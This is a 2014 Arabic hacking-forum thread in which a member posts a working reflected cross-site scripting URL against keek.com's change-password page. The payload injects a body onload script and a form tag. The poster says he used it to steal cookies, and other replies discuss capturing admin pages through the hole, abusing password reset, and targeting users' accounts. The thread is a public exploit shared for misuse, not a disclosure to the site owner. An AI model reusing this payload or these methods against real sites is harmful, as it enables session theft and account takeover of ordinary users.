الحماية للأبد -Security 4 Ever


الحماية للأبد -Security 4 Ever (https://www.sec4ever.com/home/index.php)
-   قسم جديد ثغرات الأعضاء (https://www.sec4ever.com/home/forumdisplay.php?f=60)
-   -   [شرح كتابى] xss in keek.com (https://www.sec4ever.com/home/showthread.php?t=14889)

برق الشمال 28-05-2014 12:34 PM

xss in keek.com
 
السلام عليكم ورحمة الله وبركاته

اليوم قمت بتفحص موقع الكيك المشهور :D

وحصلته مصاب بثغرة من نوع xss



فقلت ماتغلى على الحبايب


كود:

https://www.keek.com/change_password/%22%3E%3Cbody%20onload=%22javascript:alert%28%27%D8%A8%D8%B1%D9%82%20%D8%A7%D9%84%D8%B4%D9%85%D8%A7%D9%84%27%29%22%3E%3Cform%20action=
بحثت عن شخص ممكن انه اكتشف الثغره من قبل ماوجدت


عشان اعرف يجون مطفين النور مليون شخص


المهم انا بريء من الاستغلال الخاطئ

sazer_2010 28-05-2014 05:24 PM

رد: xss in keek.com
 
هل الثغرة تعمل علي firefox فقط ام انا لدي مشكله :)

Dr.Mohamed 28-05-2014 05:48 PM

رد: xss in keek.com
 
جميل جدااااا
لكن للاسف مش متفرغ لاستغلالها ض1
راح يجي يومه ان شاء الله

برق الشمال 28-05-2014 06:16 PM

رد: xss in keek.com
 
اقتباس:

المشاركة الأصلية كتبت بواسطة sazer_2010 (المشاركة 79627)
هل الثغرة تعمل علي firefox فقط ام انا لدي مشكله :)

شغاله على الفايرفوكس اخر اصدار
وتم تطبيق الثغره وسحب الكوكيز

:p
شرفني مرووركم جميعاً

Nani17 28-05-2014 07:19 PM

رد: xss in keek.com
 
حلوة =d
الله يوفق الشباب فيها
الشغل مو تارك لنا مجال نتنفّس :'(

s4udiT3rr0rist 28-05-2014 08:30 PM

رد: xss in keek.com
 
عجبتني فكرة
<form action=

Dr.Mohamed 28-05-2014 10:19 PM

رد: xss in keek.com
 
اقتباس:

المشاركة الأصلية كتبت بواسطة s4udit3rr0rist (المشاركة 79639)
عجبتني فكرة
<form action=

تلك مجرد اضافة ;)

ثغرات xss في السكربتات الخاصة فيها مشكل واحد وهو عدم معرفة هندسية الموقع وبالتالي صعوية الاستغلال
خصوصا انت مش عارف وش ممكن تجد داخل اللوحة

الحل :
فكرة ندونها قبل لا تنسى وهي عمل سكربت يعمل محاكات ماذا يحدث عند متصفح الادمن
مثال لما تدخل لوحة الموقع عن طريقة xss نعمل سكربت استقبال لمحتوى الصفحة ;)

abdotv 29-05-2014 01:39 AM

رد: xss in keek.com
 
تطوير او تفكير سليم يمكن استغلالها في استعادة كلمة المرور

بعد اسعراض الرابط يظهر نمودج تعيين كلمة السر عن طريق وضع ايميل والباسورد مرتين

جربت اعمل استعادة لحساب لي لكن لم تنجح


تحياتي

s4udiT3rr0rist 29-05-2014 11:31 AM

رد: xss in keek.com
 
اقتباس:

المشاركة الأصلية كتبت بواسطة Massacreur (المشاركة 79644)
تلك مجرد اضافة ;)

ثغرات xss في السكربتات الخاصة فيها مشكل واحد وهو عدم معرفة هندسية الموقع وبالتالي صعوية الاستغلال
خصوصا انت مش عارف وش ممكن تجد داخل اللوحة

الحل :
فكرة ندونها قبل لا تنسى وهي عمل سكربت يعمل محاكات ماذا يحدث عند متصفح الادمن
مثال لما تدخل لوحة الموقع عن طريقة xss نعمل سكربت استقبال لمحتوى الصفحة ;)


راح يكون استهدافنا لل users وليس admin
في مواقع ك هاذه

برق الشمال 29-05-2014 03:26 PM

رد: xss in keek.com
 
شرفني مروور الجميع

بالنسبه للادمن مثل المواقع هذي مثل ماتفضل الاخ

s4udiT3rr0rist



الاستهداف للحسابات المميزة او الفاحشه او غيرها




الساعة الآن 11:59 AM

Powered by vBulletin® Copyright ©2000 - 2020, Jelsoft Enterprises Ltd.